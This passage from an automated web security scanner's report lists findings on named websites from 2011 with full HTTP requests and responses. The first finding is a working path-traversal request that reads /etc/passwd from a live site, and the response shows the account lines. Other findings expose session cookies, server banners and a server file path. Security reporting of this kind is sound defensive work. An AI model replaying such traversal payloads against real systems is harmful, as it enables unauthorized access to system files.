Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /includes/javascript.php

Request

GET /includes/javascript.php?script=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:26:29 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Vary: Accept-Encoding
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 1830

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/
...[SNIP]...

32.103. http://www.nextadvisor.com/link.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /link.php

Request

GET /link.php?kw=blog20100604-blog20100604-blog201006Ne-blog201006-blog20100616-blog20100616-blog20100616-blog20100616-blog20100712-blog20100712-blog20100712-blog20100712-blog20100721-blog20100721-blog20100721-blog20100721-blog20100727-blog20100727-blog201007Ne-blog201007-blog20100727-blog20100727-blog20100812-blog20100812-blog20100812-blog20100812-blog20100816-blog20100816-blog20100816-blog20100816-blog20100817-blog20100817-blog20100817-blog20100817-blog20100826-blog20100826-blogcategory-blogcategory-blog20100826-blog20100826-blog20100224-blog20100224-blog20100224-blog20100224-blog20100225-blog20100225-blog20100225-blog20100225-blog20100226-blog20100226-blog201002Ne-blog201002-blog20100226-blog20100226-blog20100310-blog20100310-blog20100310-blog20100310-blog20100312-blog20100312-blog20100312-blog20100312-blog20100318-blog20100318-blog20100318-blog20100318-blog20100319-blog20100319-blog20100319-blog20100319-blog20100322-blog20100322-blog20100322-blog20100322-blog20100325-blog20100325-blog20100325-blog20100325-blog20100331-blog20100331-blog201003Ne-blog201003-blog20100331-blog20100331-blog20100402-blog20100402-blog20100402-blog20100402-blog20100406-blog20100406-blog20100406-blog20100406-blog20100413-blog20100413-blog20100413-blog20100413-blog20100419-blog20100419-blog201004Ne-blog201004-blog20100419-blog20100419-blog20100831-blog20100831-blog201008Ne-blog201008-blogcategory-blogcategory-blog201008Ne-blog20100831-blog20100831-blog20100831-blogcategory-blogcategory-blog20100914-blog20100914-blog20100916-blog20100916-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100917-blog20100917-blog20100914-blog20100916-blog20100916-blog20100916-blog20100916-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100917-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100920-blog20100921-blog20100921-blog20100921-blog20100921-blog20100920-blog20100921-blog20100922-blog20100922-blog20100923-blog20100923-blog20100921-blog20100922-blog20100922-blog20100922-blog20100922-blog20100923-blog20100923-blog20100927-blog20100923-blog20100927-blog20100923-blog2010Nets-blog2010-blog201009Ne-blog20100927-blog201009-blog2010Nets-blog20100927-blog20100927-blog201009Ne-blog20100927-blog20110415-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110418-blog20110419-blog20110419-blog20110418-blog20110418-blog20110418-blog20110419-blog20110418-blog20110419-blog20110419-blog20110419-blog20110419-blog20110419-blog20110420-blog20110419-blog20110420-blog20110420-blog20110420-blog20110421-blog20110421-blog20110420-blog20110420-blog20110421-blog20110421-blog20110422-blog20110421-blog20110422-blog20110422-blog20110421-blog20110422-blog201104Ne-blog201104-blog20110422-blog20110422-blog2011Nets-blog2011-blog2011Nets-blogNetspark-blog-blog201104Ne-blog20110422-blog20110422-blog20110422-blogNetspark-na_server-status_ordering38_alt_intro&category=security&link=eset&id=305 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nextadvisor.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 04:10:09 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Set-Cookie: PHPSESSID=fbb3b93f7303ec3062b1cef62bec6e33; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 26

No link for security/eset

32.104. http://www.reputationengineer.com/wp-content/plugins/cforms/lib_ajax.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.reputationengineer.com
Path:   /wp-content/plugins/cforms/lib_ajax.php

Request

POST /wp-content/plugins/cforms/lib_ajax.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Method: POST http://www.reputationengineer.com/wp-content/plugins/cforms/lib_ajax.php HTTP/1.1
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.reputationengineer.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 51

rs=reset_captcha&rst=&rsrnd=1303692470955&rsargs[]=

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 01:31:02 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
Content-Type: text/html
Content-Length: 234

+:var res = 'newcap||http://www.reputationengineer.com/wp-content/plugins/cforms/cforms-captcha.php?ts=&c1=4&c2=5&ac=abcdefghijkmnpqrstuvwxyz23456789&i=i&w=115&h=25&c=000066&l=000066&f=font4.ttf&a1=-1
...[SNIP]...

32.105. http://www.reputationengineer.com/wp-content/themes/flexibility2/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.reputationengineer.com
Path:   /wp-content/themes/flexibility2/

Request

GET /wp-content/themes/flexibility2/ HTTP/1.1
Host: www.reputationengineer.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=42aa81e376903eb93de66220fdda0695; __utmz=62854959.1303691656.1.1.utmgclid=CN-bzOa1tqgCFYbb4AodHHmKBw|utmccn=(not%20set)|utmcmd=(not%20set); turing_string_=i%2B7f6e79dd155076173dacee760bb74dea; __utma=62854959.1840992496.1303691656.1303691656.1303691656.1; __utmc=62854959; __utmb=62854959.6.10.1303691656

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:48:42 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
Content-Type: text/html
Content-Length: 379

<br />
<b>Warning</b>: Invalid argument supplied for foreach() in <b>/home/viloria/public_html/reputationengineer.com/wp-content/themes/flexibility2/index.php</b> on line <b>3</b><br />
<br />
<b>Fat
...[SNIP]...

32.106. http://www.upsellit.com/custom/trustedID.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.upsellit.com
Path:   /custom/trustedID.jsp

Request

GET /custom/trustedID.jsp HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.upsellit.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 20:07:11 GMT
Content-Type: text/html
Connection: keep-alive
Set-Cookie: JSESSIONID=1EC8C516AE02DCD23C181811D7D9B8F8; Path=/
Set-Cookie: uid=CgoKBU20gu++zjv3FP/AAg==; expires=Mon, 23-Apr-12 20:07:11 GMT; domain=www.upsellit.com; path=/
P3P: policyref="http://www.upsellit.com/w3c/p3p.xml", CP="NON DSP LAW CUR ADMi TAIi PSAi PSD TELi OUR SAMi IND PHY DEM ONL STA NAV UNI LOC COM CNT"
Content-Length: 9317


var usiURL = location.href;
if (usiURL.indexOf("promoRefCode=CJ") != -1 || usiURL.indexOf("promoRefCode=IDTHL") != -1 || usiURL.indexOf("promoRefCode=NEXTWEB") != -1){
var USILink = "http://
...[SNIP]...

32.107. http://www.upsellit.com/upsellitJS4.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.upsellit.com
Path:   /upsellitJS4.jsp

Request

GET /upsellitJS4.jsp?qs=237274223205335307291298312323312298291312293277335341334322&siteID=5512&trackingInfo=http%3A//roia.biz/im/n/sf7Xvq1BAAGSLEMAAAVwQgAAnOhmMQA-A/ HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.upsellit.com
Cookie: JSESSIONID=1EC8C516AE02DCD23C181811D7D9B8F8; uid=CgoKBU20gu++zjv3FP/AAg==

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 20:25:40 GMT
Content-Type: text/html
Connection: keep-alive
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 16772

var USItimerID = '';
var properClickThrough = false;
var USIdone = false;
var USI_suppress = false;
if (typeof(noChatPlease) != "undefined") {
   if (noChatPlease) {
   properClickThrough = true; US
...[SNIP]...

33. Content type incorrectly stated  previous  next
There are 91 instances of this issue:


33.1. http://a.rad.msn.com/ADSAdClient31.dll  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://a.rad.msn.com
Path:   /ADSAdClient31.dll

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&ID=B506C07761D7465D924574124E3C14DF&MUID=B506C07761D7465D924574124E3C14DF&PG=CMS3TL&AP=1390 HTTP/1.1
Host: a.rad.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FC00=FB=; FC01=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=; MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; Sample=37; MUID=B506C07761D7465D924574124E3C14DF; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2434
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8566055-T34931985-C42000000000035378
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 24 Apr 2011 15:57:52 GMT
Content-Length: 2434


//<![CDATA[
function getRADIds() { return{"adid":"42000000000035378","pid":"8566055","targetid":"34931985"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 728, 90);if(paren
...[SNIP]...

33.2. http://a0.twimg.com/profile_images/527575506/faabo_01_normal.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://a0.twimg.com
Path:   /profile_images/527575506/faabo_01_normal.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /profile_images/527575506/faabo_01_normal.gif HTTP/1.1
Host: a0.twimg.com
Proxy-Connection: keep-alive
Referer: http://www.arcsight.com/blog/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:46:53 GMT
Expires: Wed, 24 Apr 2019 02:31:15 GMT
Last-Modified: Sun, 15 Nov 2009 10:24:24 GMT
Cache-Control: max-age=252460800
Content-Type: image/gif
ETag: "8e323fc14e63d3070f38c80b71daa8c2"
Accept-Ranges: bytes
Server: AmazonS3
X-Amz-Cf-Id: bbdc5662816283117682256a31389804c8ee28e0c947b6ef29f749101cf380ee6ac432a0ced4229a,45bbeedfbd75e1a0b8c22a387b85db850d9a334797d3119ff0ec5ba99b82156450517684c825245d
x-amz-id-2: IK9vVLeo69Ir8IHitw2nvxegOgIA8t7KE2SjGL5AIC4/e16sSsYyKJnb4/svLXSM
x-amz-request-id: 50E57D47AAE59FE0
X-Cache: Hit from cloudfront
Content-Length: 736

.PNG
.
...IHDR...0...0......`n....    oFFs.........\..`...    pHYs...H...H.F.k>...    vpAg...6...0...oJ...hIDATX....k.A....n6....Z...xP................"^$)......1.7=.A(.....K@(xQoJ@P.*Z.!.;....&.Mv..
)8.B..}
...[SNIP]...

33.3. http://a3.twimg.com/profile_images/372426117/cc_logo_facebook_normal.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://a3.twimg.com
Path:   /profile_images/372426117/cc_logo_facebook_normal.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /profile_images/372426117/cc_logo_facebook_normal.gif HTTP/1.1
Host: a3.twimg.com
Proxy-Connection: keep-alive
Referer: http://www.arcsight.com/blog/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=252460800
Content-Length: 3354
Content-Type: image/gif
ETag: "fbab81bfa612a6812c07865548d1dbf6"
Expires: Mon, 22 Apr 2019 22:21:48 GMT
Last-Modified: Thu, 20 Aug 2009 16:52:38 GMT
Accept-Ranges: bytes
Server: AmazonS3
X-Amz-Cf-Id: 443031dabb5d5a32fe81c3cd2b0b9a6a0bf0a0205db641101505c6223f265505b08aa4855496a479,9a36d7c21e46bfb630cfec6979a4df8a411b6775db1fcaf27c0ae0e76b759bae27295bbb23651424
x-amz-id-2: ZBD1EVtMxp3+zB5zxqy02FSvc6/xkA3ZNBHELkjwuGXcMXs+IuP6wdPNyN48kRPZ
x-amz-request-id: F209315EC9719F67
X-Cache: Miss from cloudfront
Date: Sun, 24 Apr 2011 20:38:04 GMT
Connection: keep-alive

.PNG
.
...IHDR...0...0......`n....    oFFs...    ......%.....    pHYs...H...H.F.k>...    vpAg...C...0.CX.8....IDATX....o^.u.......J~.?n".E$..Zb;Z...d.p.M.>8-
.-.. .K...(.../-. n..E.X....T..6..(..H~....o3..9..
...[SNIP]...

33.4. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /PortalServe/?pid=1256655V79920110413152406&flash=0&time=0|11:46|-5&redir=http://yads.zedo.com/ads2/c%3Fa=931285%3Bn=809%3Bx=2304%3Bc=809001050,809001050%3Bg=172%3Bi=8%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=8%3Bu=xlO0TcGt89Z-t7Q0A2jzc9p9~042411%3Bk=$CTURL$&r=0.41022151810352664 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads.pointroll.com
Cookie: PRbu=EndWiNPUY; PRgo=BBBAAsJvBBVBF4FR; PRID=0BF6CA2A-ACDA-40B6-B452-CC8B2E882F48; PRvt=CBJcgEndWiNPUY!AgBBe; PRimp=D59D0400-34A2-18F5-1309-720000200101; PRca=|AKEA*263:1|#; PRcp=|AKEAAAEP:1|#; PRpl=|FFCo:1|#; PRcr=|GEHc:1|#; PRpc=|FFCoGEHc:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 24 Apr 2011 16:46:38 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Content-type: text/html
Content-length: 2479
Set-Cookie:PRgo=BAA;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=ACA10400-B4D5-95AF-1209-8C0000530202; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKKi*9708:1|AKEA*263:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKKiAC6a:1|AKEAAAEP:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FQud:1|FFCo:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GKiO:1|GEHc:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FQudGKiO:1|FFCoGEHc:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...

33.5. http://api.tweetmeme.com/url_info.jsonc  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://api.tweetmeme.com
Path:   /url_info.jsonc

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /url_info.jsonc?url=http%3A%2F%2Fwww.infusionblog.com%2F&callback=aptureJsonCallback1 HTTP/1.1
Host: api.tweetmeme.com
Proxy-Connection: keep-alive
Referer: http://www.infusionblog.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: user_unique_ident=4db0cb914d8999.97267012-57c11f7a933564d3f62b1bb71b01e19d

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 25 Apr 2011 01:40:09 GMT
Content-Type: text/html
Connection: close
P3P: CP="CAO PSA"
X-RateLimit-Limit: 400
X-RateLimit-Remaining: 399
X-Url-Lookup: OrAdd (119)
X-Served-By: ded2059
Content-Length: 407

aptureJsonCallback1({"status":"success","story":{"title":"Infusionsoft Blog","url":"http:\/\/www.infusionblog.com\/","media_type":"news","created_at":"2009-03-05 22:58:12","url_count":"27","tm_link":"
...[SNIP]...

33.6. http://ar.voicefive.com/b/rc.pli  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ar.voicefive.com
Path:   /b/rc.pli

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteraction&n=ar_int_p97174789&1303647004372 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.hotelclub.com/common/adRevresda.asp?channel=home&Section=main&adsize=728x90&pos=bottom
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p97174789=exp=1&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 12:09:48 2011&prad=253735207&arc=186884836&; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1303646989%2E757%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 12:10:01 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 42

COMSCORE.BMX.Broker.handleInteraction("");

33.7. https://arcsight.secure.force.com/resource/1277579372000/images/backcontent_foot.png  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://arcsight.secure.force.com
Path:   /resource/1277579372000/images/backcontent_foot.png

Issue detail

The response contains the following Content-type statement:The response states that it contains a PNG image. However, it actually appears to contain a JPEG image.

Request

GET /resource/1277579372000/images/backcontent_foot.png HTTP/1.1
Host: arcsight.secure.force.com
Connection: keep-alive
Referer: https://arcsight.secure.force.com/sitelogin
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Server:
Cache-Control: public
Expires: Sun, 01 May 2011 23:34:58 GMT
P3P: CP="CUR OTR STA"
Last-Modified: Sat, 26 Jun 2010 19:09:32 GMT
Content-Type: image/png; charset=UTF-8
Date: Thu, 17 Mar 2011 23:34:58 GMT
Age: 3272836
Content-Length: 5987
Connection: keep-alive

......JFIF.....d.d......Ducky.......<....Ihttp://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 4.2.2-c063 53.
...[SNIP]...

33.8. https://arcsight.secure.force.com/resource/1277579372000/images/backcontent_midd.png  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://arcsight.secure.force.com
Path:   /resource/1277579372000/images/backcontent_midd.png

Issue detail

The response contains the following Content-type statement:The response states that it contains a PNG image. However, it actually appears to contain a JPEG image.

Request

GET /resource/1277579372000/images/backcontent_midd.png HTTP/1.1
Host: arcsight.secure.force.com
Connection: keep-alive
Referer: https://arcsight.secure.force.com/sitelogin
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Server:
Cache-Control: public
Expires: Mon, 02 May 2011 06:31:15 GMT
P3P: CP="CUR OTR STA"
Last-Modified: Sat, 26 Jun 2010 19:09:32 GMT
Content-Type: image/png; charset=UTF-8
Date: Fri, 18 Mar 2011 06:31:14 GMT
Age: 3247858
Content-Length: 3838
Connection: keep-alive

......JFIF.....d.d......Ducky.......<....Ihttp://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 4.2.2-c063 53.
...[SNIP]...

33.9. http://audience.sysomos.com/track/t  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://audience.sysomos.com
Path:   /track/t

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /track/t?site=129ec802b320a9fce728bd35f466d3b0 HTTP/1.1
Host: audience.sysomos.com
Proxy-Connection: keep-alive
Referer: http://hillandknowlton.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 01:36:16 GMT
Set-Cookie: JSESSIONID=21D4DC0CEDCD773DCF040ED8138C597F; Path=/track
Set-Cookie: sysVisID=1303695376050_798279223; Expires=Sat, 23-Apr-2016 01:36:16 GMT
Cache-Control: max-age=3600
Expires: Mon, 25 Apr 2011 02:36:16 GMT
Content-Type: text/javascript
Connection: close
Content-Length: 33848

eval("\x28\x66\x75\x6e\x63\x74\x69\x6f\x6e\x28\x29\x7b\x76\x61\x72\x20\x64\x3d\x66\x75\x6e\x63\x74\x69\x6f\x6e\x28\x67\x29\x7b\x76\x61\x72\x20\x68\x3d\x77\x69\x6e\x64\x6f\x77\x2e\x6f\x6e\x6c\x6f\x61\x
...[SNIP]...

33.10. http://b2p.imgsrc.ru/b/blubberattack/1/16692341HbK.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://b2p.imgsrc.ru
Path:   /b/blubberattack/1/16692341HbK.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /b/blubberattack/1/16692341HbK.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: b2p.imgsrc.ru

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 12:39:08 GMT
Content-Type: image/jpeg
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: keep-alive
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Cache-Control: max-age=315360000
Accept-Ranges: bytes

GIF89a.............!.......,...........L..;

33.11. http://b2p.imgsrc.ru/b/blubberattack/8/13414178bpL.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://b2p.imgsrc.ru
Path:   /b/blubberattack/8/13414178bpL.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /b/blubberattack/8/13414178bpL.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
